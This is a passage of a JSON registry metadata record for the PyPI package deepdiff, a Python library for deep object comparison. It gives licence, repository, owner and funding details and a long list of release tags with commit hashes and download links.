{"id":2629476,"name":"deepdiff","ecosystem":"pypi","description":"Deep Difference and Search of any Python object/data. Recreate objects by adding adding deltas to each other.","homepage":"https://zepworks.com/deepdiff/","licenses":"MIT License","normalized_licenses":["MIT"],"repository_url":"https://github.com/qlustered/deepdiff","keywords_array":[],"namespace":null,"versions_count":90,"first_release_published_at":"2014-09-27T20:16:59.000Z","latest_release_published_at":"2026-03-30T05:52:22.000Z","latest_release_number":"9.0.0","last_synced_at":"2026-04-18T04:10:41.062Z","created_at":"2022-04-10T07:01:06.699Z","updated_at":"2026-04-18T04:10:41.063Z","registry_url":"https://pypi.org/project/deepdiff/","install_command":"pip install deepdiff --index-url https://pypi.org/simple","documentation_url":"https://zepworks.com/deepdiff/","metadata":{"funding":null,"documentation":"https://zepworks.com/deepdiff/","classifiers":["Development Status :: 5 - Production/Stable","Intended Audience :: Developers","License :: OSI Approved :: MIT License","Operating System :: OS Independent","Programming Language :: Python :: 3.10","Programming Language :: Python :: 3.11","Programming Language :: Python :: 3.12","Programming Language :: Python :: 3.13","Programming Language :: Python :: 3.14","Programming Language :: Python :: Implementation :: PyPy","Topic :: Software Development"],"normalized_name":"deepdiff","project_status":null},"repo_metadata":{"id":21179691,"uuid":"24484622","full_name":"seperman/deepdiff","owner":"seperman","description":"DeepDiff: Deep Difference and search of any Python object/data. DeepHash: Hash of any object based on its contents. Delta: Use deltas to reconstruct objects by adding deltas together.","archived":false,"fork":false,"pushed_at":"2024-08-28T20:23:33.000Z","size":2279,"stargazers_count":1978,"open_issues_count":70,"forks_count":217,"subscribers_count":26,"default_branch":"master","last_synced_at":"2024-09-07T01:51:07.955Z","etag":null,"topics":["comparison","deep-search","deepdiff","deephash","delta","diff","difference","distance","distance-calculation","hash","hashing","nested","python","reconstruction","recursive","repetition","report-repetition","tree"],"latest_commit_sha":null,"homepage":"http://zepworks.com","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/seperman.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":"docs/support.rst","governance":null,"roadmap":null,"authors":"AUTHORS.md","dei":null,"publiccode":null,"codemeta":null},"funding":{"github":["seperman"],"ko_fi":"seperman"}},"created_at":"2014-09-26T03:21:47.000Z","updated_at":"2024-09-06T07:03:43.000Z","dependencies_parsed_at":"2024-02-05T01:28:05.533Z","dependency_job_id":"5530b552-6c13-41ac-a6a8-730c7ae5c01a","html_url":"https://github.com/seperman/deepdiff","commit_stats":{"total_commits":815,"total_committers":73,"mean_commits":"11.164383561643836","dds":"0.26625766871165646","last_synced_commit":"e633e37fe6210638ba9575d84043fbb23e12ffc2"},"previous_names":[],"tags_count":50,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/seperman","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":217914542,"owners_count":16250267,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"seperman","name":"Sep Dehpour","uuid":"2314797","kind":"user","description":"A long time ago, my dad bought a CASIO calculator that I could program. I wrote my first ASCII game in it. I have not stopped coding since then.","email":"","website":"https://zepworks.com","location":"Los Angeles","twitter":null,"company":"@zepworks @qlustered ","icon_url":"https://avatars.githubusercontent.com/u/2314797?v=4","repositories_count":19,"last_synced_at":"2024-05-20T15:10:45.784Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/seperman","funding_links":["https://github.com/sponsors/seperman"],"total_stars":2317,"followers":119,"following":32,"created_at":"2022-11-02T16:28:11.952Z","updated_at":"2024-05-20T15:10:47.693Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/seperman","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/seperman/repositories"},"tags":[{"name":"7.0.1","sha":"be22027e86ccb531164404fce7fc43a6633ac135","kind":"commit","published_at":"2024-04-08T22:57:11.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/7.0.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/7.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/7.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/7.0.1/manifests"},{"name":"6.7.1","sha":"89c5cc227c48b63be4a0e1ad4af59d3c1b0272d7","kind":"commit","published_at":"2023-11-14T07:16:07.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/6.7.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/6.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.7.1/manifests"},{"name":"6.6.0","sha":"17f34a7fe2dad13911dd7d3a54eb1cf95a183cc4","kind":"commit","published_at":"2023-10-04T22:43:49.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/6.6.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/6.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.6.0/manifests"},{"name":"6.4.1","sha":"888ca776a21cecb243ccf283ce29347bb4897c34","kind":"commit","published_at":"2023-09-01T16:44:00.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/6.4.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/6.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.4.1/manifests"},{"name":"6.4.0","sha":"01260075e4f043116bf3d8c87c56458b89ee4707","kind":"commit","published_at":"2023-09-01T00:25:28.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/6.4.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/6.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.4.0/manifests"},{"name":"6.3.1","sha":"cb31948b5c8ed295c9720fbf3cf2b9f8073acd14","kind":"tag","published_at":"2023-07-06T14:27:45.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/6.3.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/6.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.3.1/manifests"},{"name":"6.3.0","sha":"d2b5ec6487b6720faaa4f778309611e30b554387","kind":"commit","published_at":"2023-03-17T18:27:19.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/6.3.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/6.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.3.0/manifests"},{"name":"6.2.3","sha":"1353b723f8faa3271d7572f0a54c5074547e257d","kind":"tag","published_at":"2023-01-06T05:00:31.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/6.2.3","html_url":"https://github.com/seperman/deepdiff/releases/tag/6.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.2.3/manifests"},{"name":"6.2.2","sha":"277ed776d9fcffbe21ac2052e5097268cbb589b7","kind":"tag","published_at":"2022-12-11T22:15:40.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/6.2.2","html_url":"https://github.com/seperman/deepdiff/releases/tag/6.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.2.2/manifests"},{"name":"6.2.1","sha":"093949f7be4f3e6fecf38a35b3a535955a8c6beb","kind":"commit","published_at":"2022-10-18T00:56:15.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/6.2.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/6.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.2.1/manifests"},{"name":"6.1.0","sha":"e916b5f6c607a722f3ace9d84189688a808ab37b","kind":"commit","published_at":"2022-08-28T02:48:24.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/6.1.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.1.0/manifests"},{"name":"6.0.0","sha":"ca8e58ee0a4fb9c855ef6c925d3c86227c538d4b","kind":"commit","published_at":"2022-08-14T01:49:40.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/6.0.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.0.0/manifests"},{"name":"v5.8.2","sha":"81341e2827d083429bcdfb4617cd40e1188bbdb7","kind":"commit","published_at":"2022-05-17T06:26:05.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v5.8.2","html_url":"https://github.com/seperman/deepdiff/releases/tag/v5.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v5.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v5.8.2/manifests"},{"name":"v5.8.1","sha":"9b70b2b5f17e345cb00aef74db7169b53f0c22e8","kind":"commit","published_at":"2022-05-13T06:41:53.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v5.8.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/v5.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v5.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v5.8.1/manifests"},{"name":"5.8.0","sha":"9c4dade2deae01307f4fd4ecf8a917d7fdbc5375","kind":"tag","published_at":"2022-04-10T06:23:13.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/5.8.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.8.0/manifests"},{"name":"5.7.0","sha":"f2ffdb83b2993f4f0bb7e854620f0acd0bf6339e","kind":"tag","published_at":"2021-12-17T19:12:40.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/5.7.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.7.0/manifests"},{"name":"5.6.0","sha":"06faa820bb83b1eac2e466b44e30dc86307895cc","kind":"commit","published_at":"2021-10-13T06:31:56.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/5.6.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.6.0/manifests"},{"name":"5.5.0","sha":"bc1ab6ae1332de93039e65ac280045674987fc5d","kind":"commit","published_at":"2021-04-29T06:20:59.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/5.5.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.5.0/manifests"},{"name":"5.3.0","sha":"2b04c553d3ed9f27a99ffe965450c2e7c2336da6","kind":"commit","published_at":"2021-04-16T23:16:30.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/5.3.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.3.0/manifests"},{"name":"5.2.3","sha":"5b66b96f1fa63f8ecc3b267e4a65c552df7d0190","kind":"commit","published_at":"2021-02-16T20:18:34.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/5.2.3","html_url":"https://github.com/seperman/deepdiff/releases/tag/5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.2.3/manifests"},{"name":"5.2.2","sha":"c6fa94ff7987eed0254e7bb124831cfda3b00fa7","kind":"commit","published_at":"2021-01-15T03:16:54.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/5.2.2","html_url":"https://github.com/seperman/deepdiff/releases/tag/5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.2.2/manifests"},{"name":"5.2.1","sha":"2451bf36f88b33c834cac493697dc6f1296c65af","kind":"commit","published_at":"2021-01-01T07:41:51.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/5.2.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.2.1/manifests"},{"name":"5.0.2","sha":"df5f49046b3c39673003968fc484a6a733b24abc","kind":"commit","published_at":"2020-07-23T17:46:48.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/5.0.2","html_url":"https://github.com/seperman/deepdiff/releases/tag/5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.0.2/manifests"},{"name":"5.0.0","sha":"15a99abefd93de22367f1bb9fec228b4dd0675f6","kind":"commit","published_at":"2020-06-23T04:19:56.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/5.0.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.0.0/manifests"},{"name":"4.3.2","sha":"af1a0d4b4d5ea91e65d306e28ed4297718b77a9a","kind":"commit","published_at":"2020-03-19T01:55:43.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/4.3.2","html_url":"https://github.com/seperman/deepdiff/releases/tag/4.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.3.2/manifests"},{"name":"4.3.1","sha":"3b3a067c43f775549a01f76a0e62b96233b5e7f4","kind":"commit","published_at":"2020-03-11T21:44:21.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/4.3.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/4.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.3.1/manifests"},{"name":"4.2.0","sha":"9b09935cd46b784529667135463c4f4a29a60bd3","kind":"commit","published_at":"2020-01-30T21:32:11.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/4.2.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.2.0/manifests"},{"name":"4.0.7","sha":"269fa49e86d9c160d925376ce1239d7504a8f330","kind":"commit","published_at":"2019-07-12T23:05:12.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/4.0.7","html_url":"https://github.com/seperman/deepdiff/releases/tag/4.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.0.7/manifests"},{"name":"4.0.6","sha":"a66879190fadc671632f154c1fcb82f5c3cef800","kind":"commit","published_at":"2019-04-13T01:06:22.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/4.0.6","html_url":"https://github.com/seperman/deepdiff/releases/tag/4.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.0.6/manifests"},{"name":"4.0.5","sha":"fa3b37399ef53d9cc75f81ca6a8e7e4f3c1a516b","kind":"commit","published_at":"2019-04-07T07:46:58.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/4.0.5","html_url":"https://github.com/seperman/deepdiff/releases/tag/4.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.0.5/manifests"},{"name":"4.0.4","sha":"b6afc83cd47296b0a1d68437a7b1fdd1a689659c","kind":"commit","published_at":"2019-04-05T06:55:41.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/4.0.4","html_url":"https://github.com/seperman/deepdiff/releases/tag/4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.0.4/manifests"},{"name":"4.0.0","sha":"885a5d5fb16622a4fce1e79bb273dd8d44a6704f","kind":"commit","published_at":"2019-03-19T10:18:57.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/4.0.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.0.0/manifests"},{"name":"v3.3.0","sha":"103a20192aa1c900863db327bd522c04418de94a","kind":"tag","published_at":"2017-06-30T21:47:42.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v3.3.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"d4918e17c555df1b46827f865c5c105097199f80","kind":"tag","published_at":"2017-05-29T05:49:30.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v3.2.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"257c3b46f4cc4c7f1769e85f98e96a7c18307b0e","kind":"tag","published_at":"2017-04-12T18:00:16.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v3.2.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"2e2f1621d2a6d28d7449431fa60b507046420127","kind":"tag","published_at":"2017-03-10T01:45:56.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v3.1.2","html_url":"https://github.com/seperman/deepdiff/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"49ec7cfce26e240ec9ac09d75bfbe3f680773bf7","kind":"tag","published_at":"2017-03-04T21:49:15.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v3.1.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.1.1/manifests"},{"name":"v3.0.0","sha":"4c67c0491c95c7b86ab109a75110112dea789303","kind":"tag","published_at":"2017-01-27T18:13:02.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v3.0.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.0.0/manifests"},{"name":"v2.5.3","sha":"ec30c3d58400fdc3116992477aa3983acc9614bb","kind":"tag","published_at":"2016-12-05T20:03:35.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v2.5.3","html_url":"https://github.com/seperman/deepdiff/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.5.3/manifests"},{"name":"v2.5.2","sha":"2a5ee8da0b08e0e37bb6a764507c0382e25b4c97","kind":"tag","published_at":"2016-12-05T03:45:03.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v2.5.2","html_url":"https://github.com/seperman/deepdiff/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.5.2/manifests"},{"name":"v2.5.0","sha":"da3333f27043fb6906358b7b7136e8d09a5f8d9c","kind":"tag","published_at":"2016-08-18T01:42:15.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v2.5.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.5.0/manifests"},{"name":"v2.1.2","sha":"877234a77465617d5118f1638aff28400ee90fd8","kind":"tag","published_at":"2016-08-09T23:11:28.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v2.1.2","html_url":"https://github.com/seperman/deepdiff/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"086f0fe9d69c861f5a01975360ece0b5e3aa76c0","kind":"tag","published_at":"2016-08-08T18:13:42.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/t